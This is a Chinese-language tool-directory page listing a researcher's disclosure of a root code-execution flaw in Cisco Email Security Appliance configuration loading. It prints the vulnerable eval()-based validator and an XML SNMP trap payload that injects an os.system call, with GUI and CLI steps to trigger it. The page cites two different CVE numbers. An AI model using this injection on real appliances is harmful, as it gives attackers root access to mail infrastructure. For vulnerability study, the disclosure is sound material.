Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cisco-CVE-2023-20009 — 思科邮件安全设备:远程代码执行 - 通过配置文件实现的RCE | Kitploit
工具/GitHubGitHub/ly1g3/cisco-cve-2023-20009
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

思科邮件安全设备:远程代码执行 - 通过配置文件实现的RCE

查看仓库
122个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

关于

安全研究员:ly1g3,ly1g3[at]tuta.io

GPG 指纹:https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

概述:远程代码执行 - RCE from config file(由配置文件触发的远程代码执行)

CVE:CVE-2023-20008

时间线:

  • 发现 - ly1g3
  • 上报 - ly1g3
  • 修复 - Cisco

Cisco AsyncOS 14.2.0

ESA(Cisco Secure Email)与 Cisco Secure Email and Web Manager

权限提升 - root shell

具有 SNMP 配置权限的已认证用户,可以通过精心构造的 SNMP trap 配置,以 root 身份执行任意代码。

技术细节

被利用的代码 ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v 将包含 common_trap.common_configuration 的值

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

通过 WEB-GUI 触发步骤:

  1. https://192.168.1.10/system_administration/configuration_file
  2. “从本地计算机加载配置文件”
  3. 用上述 payload 替换当前的 connectivityFailure 字段

通过 CLI 触发步骤

  1. loadconfig
  2. 粘贴 payload
下载工具